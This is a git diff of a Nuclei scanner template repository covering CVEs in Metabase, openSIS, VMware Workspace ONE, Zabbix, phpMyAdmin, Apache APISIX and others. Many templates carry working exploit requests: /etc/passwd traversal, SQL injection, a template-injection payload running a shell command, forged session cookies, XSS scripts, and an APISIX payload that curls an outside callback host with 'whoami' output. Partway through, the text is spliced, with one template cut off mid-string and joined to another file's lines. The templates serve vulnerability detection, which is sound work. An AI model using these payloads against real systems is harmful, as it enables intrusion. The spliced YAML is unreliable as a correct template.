b2dd58b649..d47d490eac 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41277.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41277.yaml @@ -3,22 +3,20 @@ id: CVE-2021-41277 info: name: Metabase Local File Inclusion author: 0x_Akoko - severity: high - description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. + severity: critical + description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://nvd.nist.gov/vuln/detail/CVE-2021-41277 - https://twitter.com/90security/status/1461923313819832324 - - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0 - remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41277 - cwe-id: CWE-20 metadata: - fofa-query: app="Metabase" shodan-query: http.title:"Metabase" + fofa-query: app="Metabase" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L + cvss-score: 10.0 + cve-id: CVE-2021-41277 + cwe-id: CWE-200 tags: cve,cve2021,metabase,lfi requests: @@ -35,6 +33,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/03/06 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-41282.yaml b/nuclei-templates/CVE-2021/CVE-2021-41282.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41282.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41282.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41291.yaml b/nuclei-templates/CVE-2021/CVE-2021-41291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41291.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41293.yaml b/nuclei-templates/CVE-2021/CVE-2021-41293.yaml deleted file mode 100644 index ab9790a110..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41293.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-41293 - -info: - name: ECOA Building Automation System - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose - sensitive and system information. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41293 - cwe-id: CWE-22 - tags: cve,cve2021,ecoa,lfi,disclosure - -requests: - - raw: - - | - POST /viewlog.jsp HTTP/1.1 - Host: {{Hostname}} - - yr=2021&mh=6&fname=../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41381.yaml b/nuclei-templates/CVE-2021/CVE-2021-41381.yaml deleted file mode 100644 index 3967477b8a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41381.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-41381 - -info: - name: Payara Micro Community 5.2021.6 Directory Traversal - author: pikpikcu - severity: high - description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. - reference: - - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt - - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 - - https://www.payara.fish - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41381 - cwe-id: CWE-22 - tags: cve,cve2021,payara,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties" - - matchers-condition: and - matchers: - - type: word - words: - - "payara.security.openid.default.providerURI=" - - "payara.security.openid.sessionScopedConfiguration=true" - condition: and - part: body - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml index d82d191d05..67ba68c3a7 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml @@ -1,21 +1,21 @@ id: CVE-2021-41467 info: - name: JustWriting - Reflected Cross-Site Scripting + name: JustWriting - Reflected XSS author: madrobot severity: medium - description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. reference: - https://github.com/hjue/JustWriting/issues/106 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 - - https://github.com/hjue/JustWriting/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-41467 cwe-id: CWE-79 tags: cve,cve2021,justwriting,xss + requests: - method: GET path: @@ -36,5 +36,3 @@ requests: words: - "text/html" part: header - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41649.yaml b/nuclei-templates/CVE-2021/CVE-2021-41649.yaml index 62b8d68451..c25aafc9c0 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41649.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41649.yaml @@ -1,20 +1,17 @@ id: CVE-2021-41649 info: - name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection + name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php author: daffainfo severity: critical - description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. - reference: - - https://github.com/MobiusBinary/CVE-2021-41649 - - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system - - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 + description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + reference: https://github.com/MobiusBinary/CVE-2021-41649 + tags: cve,cve2021,sqli,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-41649 cwe-id: CWE-89 - tags: cve,cve2021,sqli,injection requests: - method: POST @@ -40,5 +37,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41691.yaml b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml new file mode 100644 index 0000000000..e4c0c19078 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQL Injection + author: Bartu Utku SARP + severity: high + description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://www.exploit-db.com/exploits/50637 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 + classification: + cve-id: CVE-2021-41691 + tags: cve,cve2021,opensis,sqli,auth + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + + - | + POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + attack: pitchfork + payloads: + username: + - student + + password: + - student@123 + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "' - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml deleted file mode 100644 index d48170c9cf..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml +++ /dev/null @@ -1,94 +0,0 @@ -id: CVE-2022-21705 -info: - name: OctoberCMS Authenticated Remote Code Execution - author: iPhantasmic - severity: high - description: | - Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. - remediation: | - The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. - reference: - - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-21705 - cwe-id: CWE-74 - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection -requests: - - raw: - - | # to obtain session_key and token - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - - | # to perform authentication and obtain admin cookies - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - | # to inject php code in Markup editor and perform exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onSave - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - | # to obtain theme - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onCreateTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&type=page - - | # to access the template page for generated exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onOpenTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - cookie-reuse: true - extractors: - - type: xpath - name: session_key - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - internal: true - # Obtain _session_key for current OctoberCMS session - - type: xpath - name: token - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - internal: true - # Obtain _token for current OctoberCMS session - - type: regex - name: theme - part: body - group: 1 - regex: - - '' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Contact Form 7" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-22536.yaml b/nuclei-templates/CVE-2022/CVE-2022-22536.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-22536.yaml rename to nuclei-templates/CVE-2022/CVE-2022-22536.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml new file mode 100644 index 0000000000..066b1ec510 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-22954 + +info: + name: VMware Workspace ONE Access - Server-Side Template Injection + author: sherlocksecurity + severity: critical + description: | + VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + reference: + - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 + - https://www.vmware.com/security/advisories/VMSA-2022-0011.html + - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22954 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22954 + cwe-id: CWE-94 + metadata: + shodan-query: http.favicon.hash:-1250474341 + tags: cve,cve2022,vmware,ssti,workspaceone + +requests: + - method: GET + path: + - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" # Executes cat /etc/hosts + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Authorization context is not valid" + + - type: status + status: + - 400 + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml new file mode 100644 index 0000000000..f0934ac0fe --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml @@ -0,0 +1,93 @@ +id: CVE-2022-22972 +info: + name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass + author: For3stCo1d,princechaddha + severity: critical + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + reference: + - https://github.com/horizon3ai/CVE-2022-22972 + - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive + - https://www.vmware.com/security/advisories/VMSA-2022-0014.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22972 + cwe-id: CWE-287 + metadata: + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + tags: cve,cve2022,vmware,auth-bypass,oast +requests: + - raw: + - | + GET /vcac/ HTTP/1.1 + Host: {{Hostname}} + - | + GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 + Host: {{Hostname}} + - | + POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 + Host: {{interactsh-url}} + Content-type: application/x-www-form-urlencoded + + protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in + redirects: true + max-redirects: 3 + cookie-reuse: true + extractors: + - type: regex + part: body + name: protected_state + group: 1 + regex: + - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' + internal: true + - type: regex + part: body + name: horizonRelayState + group: 1 + regex: + - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' + internal: true + - type: regex + part: body + name: userstore + group: 1 + regex: + - 'id="userstore" value="([a-z.]+)" \/>' + internal: true + - type: regex + part: body + name: userstoreDisplay + group: 1 + regex: + - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' + internal: true + - type: regex + part: body + name: stickyConnectorId + group: 1 + regex: + - 'name="stickyConnectorId" value="(.*)"/>' + internal: true + - type: kval + part: header + name: HZN-Cookie + kval: + - 'HZN' + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + - type: status + status: + - 302 + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml b/nuclei-templates/CVE-2022/CVE-2022-23131.yaml deleted file mode 100644 index 0f93ea7161..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-23131 - -info: - name: Zabbix - SAML SSO Authentication Bypass - author: For3stCo1d - severity: critical - description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. - reference: - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://github.com/1mxml/CVE-2022-23131 - metadata: - shodan-query: http.favicon.hash:892542951 - fofa-query: app="ZABBIX-监控系统" && body="saml" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.8 - cve-id: CVE-2022-23131 - tags: cve,cve2022,zabbix,auth-bypass,saml,sso - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/index_sso.php" - - "{{BaseURL}}/index_sso.php" - - headers: - Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: dsl - dsl: - - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" diff --git a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml b/nuclei-templates/CVE-2022/CVE-2022-23134.yaml new file mode 100644 index 0000000000..8a1b34df97 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23134.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-23134 + +info: + name: Zabbix Setup Configuration Authentication Bypass + author: bananabr + severity: medium + description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + reference: + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 + - https://support.zabbix.com/browse/ZBX-20384 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-23134 + tags: cve,cve2022,zabbix,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/zabbix/setup.php" + - "{{BaseURL}}/setup.php" + + headers: + Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Database" + - "host" + - "port" + - "Zabbix" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23347.yaml b/nuclei-templates/CVE-2022/CVE-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23347.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml b/nuclei-templates/CVE-2022/CVE-2022-23808.yaml new file mode 100644 index 0000000000..b174bac40d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23808.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-23808 + +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo + severity: medium + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + reference: + - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A + - https://github.com/dipakpanchal456/CVE-2022-23808 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23808 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "\">" + - "

    Add a new server

    " + - "phpMyAdmin setup" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23881.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23881.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml index de7aa65f39..830928fc23 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml @@ -5,20 +5,30 @@ info: author: cckuakilong severity: critical description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel. + remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y - remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. + - http://www.openwall.com/lists/oss-security/2022/01/25/15 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-23944 - cwe-id: CWE-306 + cwe-id: CWE-306,CWE-862 + epss-score: 0.45887 + epss-percentile: 0.97086 + cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: shenyu tags: cve,cve2022,shenyu,unauth,apache -requests: +http: - method: GET path: - "{{BaseURL}}/plugin" @@ -35,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/08 +# digest: 490a0046304402207d4b54505896da78a61426b82a09c16b3004ec88eaafb319e9154fc6619cf00b0220133dc543f97181df2601ebbfe17254135ff340b3160efb33fad2e75fc4b49dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml b/nuclei-templates/CVE-2022/CVE-2022-24112.yaml deleted file mode 100644 index 119a801f06..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: CVE-2022-24112 - -info: - name: Apache APISIX - Remote Code Execution - author: Mr-xn - severity: critical - description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - reference: - - https://www.openwall.com/lists/oss-security/2022/02/11/3 - - https://twitter.com/sirifu4k1/status/1496043663704858625 - - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-24112 - cwe-id: CWE-290 - metadata: - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org - shodan-query: title:"Apache APISIX Dashboard" - tags: cve,cve2022,apache,rce,apisix,oast - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - { - "headers":{ - "X-Real-IP":"127.0.0.1", - "Content-Type":"application/json" - }, - "timeout":1500, - "pipeline":[ - { - "method":"PUT", - "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" - } - ] - } - - | - GET /api/{{randstr}} HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - '"reason":"OK"' - - '"status":200' - condition: and - - - type: status - status: - - 200 - - - type: word - part: interactsh_protocol - words: - - 'http' - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - 'GET \/([a-z-]+) HTTP' - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml deleted file mode 100644 index 706599f0a0..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-24181 -info: - name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) - author: lucasljm2001,ekrause - severity: medium - description: | - Detects an XSS vulnerability in Open Journals System. - reference: - - https://www.exploit-db.com/exploits/50881 - - https://github.com/pkp/pkp-lib/issues/7649 - - https://youtu.be/v8-9evO2oVg - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 - - https://nvd.nist.gov/vuln/detail/cve-2022-24181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24181 - metadata: - verified: true - tags: cve,cve2022,xss,oss,pkp-lib -requests: - - raw: - - | - GET /iupjournals/index.php/esj HTTP/2 - Host: {{Hostname}} - X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<script>alert(document.domain)</script><x=".com/iupjournals' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git 